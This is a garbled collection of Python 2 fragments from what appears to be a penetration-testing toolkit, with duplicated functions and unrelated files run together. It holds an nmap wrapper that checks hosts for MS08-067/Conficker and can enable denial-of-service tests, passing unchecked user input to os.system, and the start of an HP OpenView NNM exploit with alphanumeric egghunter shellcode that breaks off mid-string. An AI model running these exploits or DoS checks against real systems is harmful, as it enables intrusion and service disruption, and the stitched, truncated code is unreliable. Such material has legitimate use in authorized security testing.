def get_target(counter, self_banner):
""" get user input, check for valid input, and
loop back through if invalid input is entered. """
tries = counter
target_input = raw_input("""
NOTE: A single host or a network/block can be specified for testing.
examples: 192.168.1.21
192.168.1.0/24
Enter the host or range to be checked: """)
if counter == 3:
print_banner()
print self_banner
sleep(1)
print " Just so you know...I can go on like this all day...."
sleep(1)
tries = 0
get_target(tries, self_banner)
if target_input == "" or len(target_input.split(".")) != 4:
print_banner()
print self_banner
print " *** YOU MUST ENTER A VALID HOST OR RANGE TO CHECK **"
tries += 1
get_target(tries, self_banner)
else:
return (target_input)
def get_target(counter, self_banner):
""" get user input, check for valid input, and
loop back through if invalid input is entered. """
tries = counter
target_input = raw_input(
"""
NOTE: A single host or a network/block can be specified for testing.
examples: 192.168.1.21
192.168.1.0/24
Enter the host or range to be checked: """
)
if counter == 3:
print_banner()
print self_banner
sleep(1)
print " Just so you know...I can go on like this all day...."
sleep(1)
tries = 0
get_target(tries, self_banner)
if target_input == "" or len(target_input.split(".")) != 4:
print_banner()
print self_banner
print " *** YOU MUST ENTER A VALID HOST OR RANGE TO CHECK **"
tries += 1
get_target(tries, self_banner)
else:
return target_input
def nmapsmbcheckvulns_run():
""" Main execution logic: reuse common
nse modules for this nse script """
self_banner = """ ** Nmap Scripting Engine: Script - smb-check-vulns **
** **
** Checks a host or network MS08-067 **
** for vulnerability to: Conficker infection **
** regsvc DoS: (When enabled) **
** SMBv2 DoS: (When enabled) **
*****************************************************************
"""
# BEGIN MAIN EXECUTION
counter = 0
print_banner()
print self_banner
print " <ctrl>-c at any time to Cancel"
# get the host or network to operate on
target = get_target(counter, self_banner)
# enable or disable this scripts arguments
aggressive = raw_input(
"""\n Do you want to enable aggressive testing (regsvc, SMBv2 DoS)?
WARNING: these checks can cause a Denial of Service! [y|n]: """)
# check answer on aggressive mode
if aggressive == "y" or aggressive == "yes":
command = "nmap --script smb-check-vulns --script-args=unsafe=1 -p445 %s" % target
runnse(command)
if aggressive == "n" or aggressive == "no":
command = "nmap --script smb-check-vulns -p445 %s" % target
runnse(command)
def nmapsmbcheckvulns_run():
""" Main execution logic: reuse common
nse modules for this nse script """
self_banner = """ ** Nmap Scripting Engine: Script - smb-check-vulns **
** **
** Checks a host or network MS08-067 **
** for vulnerability to: Conficker infection **
** regsvc DoS: (When enabled) **
** SMBv2 DoS: (When enabled) **
*****************************************************************
"""
# BEGIN MAIN EXECUTION
counter = 0
print_banner()
print self_banner
print " <ctrl>-c at any time to Cancel"
# get the host or network to operate on
target = get_target(counter,self_banner)
# enable or disable this scripts arguments
aggressive = raw_input("""\n Do you want to enable aggressive testing (regsvc, SMBv2 DoS)?
WARNING: these checks can cause a Denial of Service! [y|n]: """)
# check answer on aggressive mode
if aggressive == "y" or aggressive == "yes":
command = "nmap --script smb-check-vulns --script-args=unsafe=1 -p445 %s" % target
runnse(command)
if aggressive == "n" or aggressive == "no":
command = "nmap --script smb-check-vulns -p445 %s" % target
runnse(command)
def runnse(command):
print_banner()
os.system(command)
raw_input("\nPress <enter> to return...\n")
#!/usr/bin/env python
import socket
import os
import sys
from time import sleep
from bin.include import print_banner
# Alphanumeric egghunter shellcode + restricted chars \x40\x3f\x3a\x2f - ph33r
# One egg to rule them all.
print_banner()
try:
target = sys.argv[4]
except IndexError:
print "HP OpenView NNM Exploit:\n"
print """
********************* NOTE *************************
If this exploit is not executed against the intended
target chances are it will not succeed.
<ctrl>-c to Cancel
"""
target = raw_input(" Enter the IP Address to Attack: ")
egghunter = ("%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J"
"MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5"
"21*-q!au-q!au-oGSePAA%JMNU%521*-D"
"A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1"
"z1E-oRHEPAA%JMNU%521*-3s1--331--^"
"TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA"
#!/usr/bin/env python
import os
import sys
from bin.include import print_banner
definepath=os.getcwd()
openfile=file("%s/readme/CHANGELOG" % (definepath),"r").readlines()
print_banner()
print '\n'
for line in openfile:
print line.rstrip()
pause=raw_input("\bHit enter to return to main menu.")
def runnse(command):
print_banner()
os.system(command)
raw_input("\nPress <enter> to return...\n")
